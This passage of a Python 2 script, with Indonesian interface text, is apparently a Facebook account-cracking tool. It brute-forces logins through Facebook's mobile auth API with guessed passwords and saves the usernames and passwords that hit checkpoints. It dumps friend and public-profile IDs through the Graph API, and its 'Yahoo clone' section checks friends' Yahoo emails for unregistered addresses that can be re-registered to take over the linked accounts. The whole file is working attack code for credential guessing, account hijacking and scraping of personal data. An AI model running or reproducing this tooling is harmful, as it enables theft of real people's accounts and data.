oks.append(user.lower()+sandi4)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi4
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi4+"\n")
cek.close()
cekpoint.append(user.lower()+sandi4)
else:
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi5
oks.append(user.lower()+sandi5)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi5
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi5+"\n")
cek.close()
cekpoint.append(user.lower()+sandi5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;96m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;96m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;91m"+str(len(cekpoint))
print("\033[1;97m[\033[1;96m!\033[1;97m] \033[1;97mCP file tersimpan : out/world.txt")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
######### DUMP ##########
def dump():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
menu()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;95m01\033[1;97m]\033[1;96m->\033[1;97m Ambil ID dari daftar teman "
print "\033[1;97m[\033[1;95m02\033[1;97m]\033[1;96m->\033[1;97m Ambil ID dari publik/teman "
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali "
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
dump_pilih()
def dump_pilih():
cuih = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if cuih =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
dump_pilih()
elif cuih =="1" or cuih =="01":
id_teman()
elif cuih =="2" or cuih =="02":
idfrom_teman()
elif cuih =="0" or cuih =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;95m•\033[1;97m] \033[1;97mMengambil semua ID teman \033[1;97m...')
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[\033[1;95m"+str(len(idteman))+"\033[1;97m]\033[1;97m =>"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;93m'+a['id']
bz.close()
print '\r\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;95m!\033[1;97m] \033[1;97mTotal ID : %s"%(len(idteman))
done = raw_input("\r\033[1;97m[\033[1;95m?\033[1;97m] \033[1;97mSimpan nama file : ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mFile tersimpan : \033[1;97mout/"+done)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except IOError:
print"\033[1;91m[!] Gagal membuat file"
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti !")
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except KeyError:
print('\033[1;91m[!] Gagal !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print('\033[1;97m[\033[1;95m!\033[1;97m]\033[1;97m File anda tidak tersimpan !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except requests.exceptions.ConnectionError:
print"\033[1;97m[×] Tidak ada koneksi !"
keluar()
##### ID PUBLIK #####
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m[\033[1;95m+\033[1;97m] ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mNama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;95m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;95m•\033[1;97m] \033[1;97mMengambil Semua Id ...')
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;93m ' + a['id']
bz.close()
print '\r\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mSukses Mengambil Id \033[1;97m....'
print"\r\033[1;97m[\033[1;95m•\033[1;97m] Total ID : %s"%(len(idfromteman))
done = raw_input("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mSimpan nama file : ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[\033[1;95m√\033[1;97m] File tersimpan : out/"+done)
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print"\033[1;97m[!] File Tidak Tersimpan "
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except IOError:
print"\033[1;97m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
os.system("python2 vip.py")
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;97m[\033[1;95m!\033[1;97m] Teman tidak ada !')
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;97m[\033[1;91m✖\033[1;97m] Tidak ada koneksi !"
keluar()
##### PROFIL GUARD #####
def guard():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;90m01\033[1;97m]\033[1;96m->\033[1;97m Aktifkan profile guard"
print "\033[1;97m[\033[1;90m02\033[1;97m]\033[1;96m->\033[1;97m Nonaktifkan profile guard"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
guard_pilih()
def guard_pilih():
guar = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if guar =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
guard_pilih()
elif guar =="1" or guar =="01":
aktif = "true"
gaz(toket, aktif)
elif guar =="2" or guar =="02":
non = "false"
gaz(toket, non)
elif guar =="0" or guar =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
guard_pilih()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable="true"):
    # `enable` is interpolated into the GraphQL variables as a JSON boolean,
    # so callers pass the strings "true"/"false" (see guard_pilih() above);
    # a Python True would render as "True", which is not valid JSON.
    id = get_userid(toket)
    data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
    headers = {"Content-Type": "application/x-www-form-urlencoded", "Authorization": "OAuth %s" % toket}
    url = "https://graph.facebook.com/graphql"
    res = requests.post(url, data=data, headers=headers)
    print(res.text)
    if '"is_shielded":true' in res.text:
        os.system('clear')
        print logo
        print "\033[97m[\033[92m✓\033[97m]\033[92m Sukses Mengaktifkan ..."
        raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
        menu()
    elif '"is_shielded":false' in res.text:
        os.system('clear')
        print logo
        print "\033[97m[\033[91m✓\033[97m]\033[91m Sukses Menonaktifkan ..."
        raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
        menu()
    else:
        print "\033[91m[!] Error"
        keluar()
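# Minimal usage sketch for the guard toggle (assumes `toket` already holds a
# valid access token string):
#   gaz(toket, "true")   # turn the profile picture shield on
#   gaz(toket, "false")  # turn it off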
##### YAHOO CLONE #####
def menu_yahoo():
    global toket
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print "\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        login()
    os.system("clear")
    print logo
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;97m Clone dari daftar teman"
    print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;97m Clone dari publik/teman"
    print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    yahoo_pilih()
#### YAHOO MENU CHOICE ####
def yahoo_pilih():
    go = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
    if go == "":
        print "\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
        yahoo_pilih()
    elif go == "1" or go == "01":
        yahoofriends()
    elif go == "2" or go == "02":
        yahoofromfriends()
    elif go == "0" or go == "00":
        menu()
    else:
        print "\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
        yahoo_pilih()
##### FRIEND LIST #####
def yahoofriends():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print "\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        login()
    try:
        os.mkdir('out')
    except OSError:
        pass
    os.system('clear')
    print logo
    mpsh = []
    jml = 0
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    jalan('\033[1;97m[\033[1;92m~\033[1;97m] Mengambil email ...')
    teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
    kimak = json.loads(teman.text)
    save = open('out/mailku.txt', 'w')
    jalan('\033[1;97m[\033[1;92m•\033[1;97m] Mulai clone ...')
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    for w in kimak['data']:
        jml += 1
        mpsh.append(jml)
        id = w['id']
        nama = w['name']
        links = requests.get("https://graph.facebook.com/" + id + "?access_token=" + toket)
        z = json.loads(links.text)
        try:
            mail = z['email']
            # keep only the domain part of the address, e.g. "@yahoo.com"
            yahoo = re.compile(r'@.*')
            otw = yahoo.search(mail).group()
            if 'yahoo.com' in otw:
                # probe Yahoo's login form: an "invalid username" response
                # means the address is no longer registered at Yahoo
                br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
                br._factory.is_html = True
                br.select_form(nr=0)
                br["username"] = mail
                klik = br.submit().read()
                jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
                try:
                    pek = jok.search(klik).group()
                except AttributeError:  # no match -> search() returned None
                    continue
                if '"messages.ERROR_INVALID_USERNAME">' in pek:
                    save.write(mail + '\n')
                    print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" + mail + " \033[1;97m=>" + nama)
                    berhasil.append(mail)
        except KeyError:
            pass
    print '\033[1;97m[\033[1;92m✓\033[1;97m] Selesai ...'
    print "\033[1;97m[\033[1;92m+\033[1;97m] Total : " + str(len(berhasil))
    print "\033[1;97m[\033[1;92m•\033[1;97m] File tersimpan : out/mailku.txt"
    save.close()
    raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
    os.system("python2 vip.py")
##### CLONE FROM PUBLIC PROFILE #####
def yahoofromfriends():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print "\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        login()
    try:
        os.mkdir('out')
    except (OSError, requests.exceptions.ConnectionError):
        pass
    os.system('clear')
    print logo
    mpsh = []
    jml = 0
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    idt = raw_input("\033[1;97m[\033[1;92m+\033[1;97m] ID publik/teman : ")
    try:
        jok = requests.get("https://graph.facebook.com/" + idt + "?access_token=" + toket)
        op = json.loads(jok.text)
        print "\033[1;97m[\033[1;92m✓\033[1;97m] Nama : " + op["name"]
    except KeyError:
        print "\033[1;91m[!] ID publik/teman tidak ada"
        raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
        menu_yahoo()
    jalan('\033[1;97m[\033[1;92m~\033[1;97m] Mengambil email ...')
    teman = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
    kimak = json.loads(teman.text)
    save = open('out/mailteman.txt', 'w')
    jalan('\033[1;97m[\033[1;92m•\033[1;97m] Mulai clone\033[1;97m...')
    print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    for w in kimak['data']:
        jml += 1
        mpsh.append(jml)
        id = w['id']
        nama = w['name']
        links = requests.get("https://graph.facebook.com/" + id + "?access_token=" + toket)
        z = json.loads(links.text)
        try:
            mail = z['email']
            yahoo = re.compile(r'@.*')
            otw = yahoo.search(mail).group()
            if 'yahoo.com' in otw:
                br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
                br._factory.is_html = True
                br.select_form(nr=0)
                br["username"] = mail
                klik = br.submit().read()
                jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
                try:
                    pek = jok.search(klik).group()
                except AttributeError:  # no match -> search() returned None
                    continue
                if '"messages.ERROR_INVALID_USERNAME">' in pek:
                    save.write(mail + '\n')
                    print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" + mail + " \033[1;97m=>" + nama)
                    berhasil.append(mail)
        except KeyError:
            pass
    print '\033[1;97m[\033[1;92m✓\033[1;97m] Selesai ....'
    print "\033[1;97m[\033[1;92m•\033[1;97m] Total : " + str(len(berhasil))
    print "\033[1;97m[\033[1;92m!\033[1;97m] File tersimpan : out/mailteman.txt"
    save.close()
    raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
    os.system("python2 vip.py")
####### ABOUT ME #######
def saya():
    os.system('clear')
    print logo
    jalan(' \033[92mAnda Akan Di Arahkan Ke Browser')
    os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
    menu()

if __name__ == '__main__':
    menu()
    masuk()